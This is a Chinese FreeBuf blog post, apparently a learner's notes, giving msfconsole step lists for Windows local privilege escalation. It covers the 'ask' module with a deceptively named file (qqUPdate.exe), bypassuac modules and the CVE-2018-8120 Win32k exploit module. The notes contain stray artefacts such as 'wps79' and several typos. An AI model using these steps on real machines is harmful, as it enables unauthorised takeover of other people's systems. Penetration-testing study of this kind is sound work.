freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

内网渗透 day5-msf本地提权(windows)
2020-11-16 13:27:50

msf本地提权

1. 利用uac提权

前提与目标机建立会话连接

  1. seach local/ask     搜索关键字local/ask  
  2. use 0      进入到exploit/windows/local/ask模块下
  3. show options 查看相关参数
  4. set FILENAME qqUPdate.exe 设置文件名qqUPdate.exe(具有迷惑性的名字都可以)
  5. set session 1     设置会话窗口(先查看一下会话的id)
  6. run执行wps79
  7. 目标机弹出弹窗
  8. 点击是后,成功进入meterpreter命令行
  9. 这时候getsystem就可以成功提权

2. 绕过uac认证

  1. search bypassuac     搜索bypassuac关键字(显示有13个提取脚本,一个不行就换一个)wps83
  2. use 3     进入编号为3的提权脚本模块
  3. show opthions 查看相关参数
  4. 查看会话并且设置会话
  5. show targets 显示可选平台
  6. set target 0       设置为X86
  7. run 执行
  8. 提权成功

3. 利用windows本地提权漏洞进行提权

  1. cve-2018-8120      Win32k权限提升漏洞],影响范围(Windows 7 SP1/2008 SP2,2008 R2 SP1)
  2. search cve-2018-8120   查找关键字
  3. use 0 进入该模块
  4. show options 查看相关参数
  5. session 查看会话
  6. 设置为没有权限的会话3
  7. 进入后直接获得管理员权限





# 内网渗透 # Windows提权
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者